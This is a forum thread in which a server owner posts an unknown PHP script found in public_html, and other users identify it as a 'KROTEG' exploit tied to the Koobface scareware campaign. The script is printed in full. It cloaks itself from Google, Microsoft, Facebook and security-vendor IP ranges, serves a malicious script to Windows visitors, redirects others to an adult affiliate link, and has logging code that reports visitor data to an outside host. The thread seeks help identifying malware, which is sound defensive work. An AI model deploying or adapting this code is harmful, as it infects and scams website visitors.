Found Weird Code On My VPS

I found a folder with this code on my VPS, any idea of what its doing? I didnt put it there.

<?
error_reporting(0);
ini_set('display_errors', 0);
ini_set('error_reporting', 0);

$pic_fn = "4uo.jpg";
$swf_fn = "";
$js_fn = "mmnsmy2mmg.php";

if (isset($_GET['test']) && $_GET['test']==1) {
   	print "KROTEG\n1291584844";
	if (is_file($js_fn)) {
		print "\njs_ok";
	}
	else {
		print "\njs_err";
	}
	print "\n".$_SERVER['REMOTE_ADDR']."|".$_SERVER['HTTP_USER_AGENT']."|".$_SERVER['HTTP_REFERER'];
    exit();
}
?>
<?
		$ip_srv = "www.iranconsul.ae";
		$dir = "/111";
		
		$ip = $_SERVER["REMOTE_ADDR"];
		
		$tmp = explode(".", $ip);
		unset($tmp[3]); unset($tmp[2]);
		$net = trim(implode(".", $tmp));	
		
	
		
		function f_chars ($string) {
		
			$tmp = explode("h=", $string);
			$val = $tmp[count($tmp)-1];
			
			if (strlen($val) == 5) {
				return true; 
				
			}
			else {
				return false;
			}			
			
		}
		
		function win(){
		global $js_fn;
        global $ip_srv, $dir;
        
        
        
		$path = $dir."/llog.php?filter=win&ip=".urlencode($_SERVER["REMOTE_ADDR"])."&ua=".urlencode($_SERVER["HTTP_USER_AGENT"])."&ref=".urlencode($_SERVER["HTTP_REFERER"])."&host=".urlencode($_SERVER["SERVER_NAME"]);
		//f_get_contents($ip_srv, $path);		
	
		$param = "";
		
		if (isset($_REQUEST["ref"]) && $_REQUEST["ref"] == "ms") {
			$param = "ref=ms";	
		}
		elseif (isset($_REQUEST["ref"]) && $_REQUEST["ref"] == "tw") {
			$param = "ref=tw";	
		}		
		else {
			if (!(strstr($_SERVER["HTTP_REFERER"], "myspace.com") === FALSE) || !(strstr($_SERVER["HTTP_REFERER"], "msplinks.com") === FALSE) || !(strstr($_SERVER["HTTP_REFERER"], "lnk.ms") === FALSE)) {
				$param = "ref=ms";
			}
			elseif (!(strstr($_SERVER["HTTP_REFERER"], "twitter.com") === FALSE)) {
				if (!(strstr($_SERVER["HTTP_REFERER"], "/status/") === FALSE)) {
					$param = "ref=ms";
				}
				else {
					$param = "ref=tw";
				}
			}			
		}
		
		echo "<html><title>".rand()."</title><body><script src=".$js_fn."?".$param."></script></body></html>";
		exit;
		
		}
		
		
		
		function bot($reason = "unknown"){
        global $ip_srv, $dir;
		$path = $dir."/llog.php?filter=bot&ip=".urlencode($_SERVER["REMOTE_ADDR"])."&ua=".urlencode($_SERVER["HTTP_USER_AGENT"])."&ref=".urlencode($_SERVER["HTTP_REFERER"])."&reason=$reason"."&host=".urlencode($_SERVER["SERVER_NAME"]);

		//f_get_contents($ip_srv, $path);	
	
		print file_get_contents("rss.html");
		exit;
		
		}	
		
		function other(){
            global $ip_srv, $dir;
			$path = $dir."/llog.php?filter=other&ip=".urlencode($_SERVER["REMOTE_ADDR"])."&ua=".urlencode($_SERVER["HTTP_USER_AGENT"])."&ref=".urlencode($_SERVER["HTTP_REFERER"])."&host=".urlencode($_SERVER["SERVER_NAME"]);
			//f_get_contents($ip_srv, $path);
						print "<h1 align=\"center\">This video is for Windows computers ONLY!</h1>
						<h2 align=\"center\">Redirecting... Please wait 5 seconds...</h2>
						<script type=\"text/javascript\">
						function redirect ()
						{
						";
											

						print "window.location.href = \"http://adultfriendfinder.com/go/g1274694-pct+search\" ;";

										
						print "
						}
						setTimeout(\"redirect()\" , 5000);
						</script>				
						";
		
		exit;
		}	
		
		function f_get_contents($domain, $path) {
		
		    $out = "";
		    
			$fp = @fsockopen($domain, 80, $errno, $errstr, 3);
			if ($fp) {
				
		
			    $out = "GET ".$path." HTTP/1.0\r\n";
			    $out .= "Host: ".$domain."\r\n";
			    $out .= "Connection: Close\r\n\r\n";
				
			    fwrite($fp, $out);
			    while (!feof($fp)) {
			        $out .= fgets($fp, 128);
			    }
			    fclose($fp);
			    
				$tmp = explode("\r\n\r\n", $out);
				unset($tmp[0]);
				unset($tmp[1]);
				$out = implode("\r\n\r\n", $tmp);
				
				return $out;
			    		    	    
			}
		
		}				
		
		// setka
				
		$arr_mask = array(


		
		"65.52.0.0 - 65.55.255.255",	//microsoft
		"66.220.144.0 - 66.220.159.255",//facebook
		"69.63.176.0 - 69.63.191.255",  //facebook
		"69.171.224.0 - 69.171.255.255",//facebook
/*
		"128.241.0.0 - 128.241.255.255",
		"130.94.0.0 - 130.94.255.255",
		"147.203.0.0 - 147.203.255.255",
		"165.234.0.0 - 165.234.255.255",
		"168.143.0.0 - 168.143.255.255",
		"198.172.0.0 - 198.172.255.255",
		"198.65.0.0 - 198.65.255.255",
		"205.212.0.0 - 205.212.255.255",
		"206.251.0.0 - 206.251.255.255",
		"206.71.0.0 - 206.71.255.255",
		"207.158.0.0 - 207.158.255.255",
		"207.195.0.0 - 207.195.255.255",
		"207.67.0.0 - 207.67.255.255",
		"209.59.0.0 - 209.59.255.255",
*/
		
		//GOOGLE
		"216.239.32.0 - 216.239.63.255",
		"64.233.160.0 - 64.233.191.255",
		"66.249.64.0 - 66.249.95.255",
		"72.14.192.0 - 72.14.255.255",
		"209.85.128.0 - 209.85.255.255",
		"173.194.0.0 - 173.194.255.255",
		"70.32.128.0 - 70.32.159.255",
		"74.125.0.0 - 74.125.255.255",
		"70.89.39.152 - 70.89.39.159",
		"70.90.219.72 - 70.90.219.79",
		"70.90.219.48 - 70.90.219.55",
		
		// bitly
		"184.72.0.0 - 184.73.255.255",
		"204.236.128.0 - 204.236.255.255",

		// proxy ?
		"188.165.197.0 - 188.165.197.255",

		//Motorola - Jakarta Commons-HttpClient/3.1
		"69.10.176.0 - 69.10.181.255",
		"192.55.31.0 - 192.55.31.255",	

		//Yahoo
		"76.13.0.0 - 76.13.255.255",

		//Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1); Japan Network Information Center
		"150.70.64.0 - 150.70.75.255",		
		
		//30-09-2010 8:46
		"192.35.222.0 - 192.35.222.255",
		"128.111.0.0 - 128.111.255.255",
		
		//msbots
		"204.16.32.0 - 204.16.35.255",
		"69.164.192.0 - 69.164.223.255",
		
		//sumantec
		"216.10.192.0 - 216.10.207.255",
		"117.193.0.0 - 117.193.255.255",


		
		);
		
		$ip_int = ip2long($ip);

//#######################
		//bot("TEST");
		//exit;
//#######################
		
		foreach ($arr_mask as $el) {
		
			$mask = explode("-", $el);
			
			$start = ip2long(trim($mask[0]));
			$finish = ip2long(trim($mask[1]));


		
			if ($ip_int >= $start && $ip_int <= $finish) {
				bot("net");
			}
			
		}	
		


		// pustoi ref and win
		if($_SERVER["HTTP_REFERER"] == "" && !(strpos($_SERVER["HTTP_USER_AGENT"],"Windows") === false)) {bot("noref_n_win");}
		
		// user_agent soderjit facebook
		if (!(strpos($_SERVER["HTTP_USER_AGENT"],"facebook") === false)) {bot("ua_facebook");}

		// bot in user_agent
		if (!(strpos($_SERVER["HTTP_USER_AGENT"],"bot") === false)) {bot("ua_bot");}

		// crawler in user_agent
		if (!(strpos($_SERVER["HTTP_USER_AGENT"],"crawler") === false)) {bot("ua_crawler");}
		
		// pustoi user_agent
		if($_SERVER["HTTP_USER_AGENT"] == "") {bot("ua_null");}
		

        // reff imgrefurl
        if(strpos($_SERVER["HTTP_REFERER"], "imgrefurl")!== false) {bot("bad_ref");}
		
		//korotkiy ua
		if(strlen ($_SERVER["HTTP_USER_AGENT"]) < 55 ) {bot("ua_short");}

		
		// user_agent Windows
		if(!(strpos($_SERVER["HTTP_USER_AGENT"],"Windows") === false)) {win();}

										
		other(); 
		
			
		?>
<?
exit();
?>

<html>
<head>
<title>Hello</title>
</head>
<body>
hey rogazi
</body>
</html>

Code (markup):

 

Some kind of proxying/exploiting script by the looks of it. I'm no expert, however I suggest you have one look at it...

However, I would be more concerned about how a script like that got there. What was the location of the script?

 

It is KROTEG exploit - I strongly suggest you to take it down as soon as possible and inspect your VPS for any leftovers ( I'm pretty sure the will be lot ).

 

Thanks, I deleted it as soon as I found it, it was in public_html, I looked for any other files but did not find anymore.

 

Clean temporary or cache folders as well

 

Looks dangerous. I believe it may be used for DOS attacks against other networks.

 

its a part of the koobface virus, distributes rogue anti-virus applications/scare ware to scam people to purchase "fake" anti-virus application licenses to remove fake infections.
Read more here: http://r3v3rs3e.wordpress.com/2009/09/18/koobface-on-the-move-serving-scareware/

 

That is so strange, how the heck you got it there???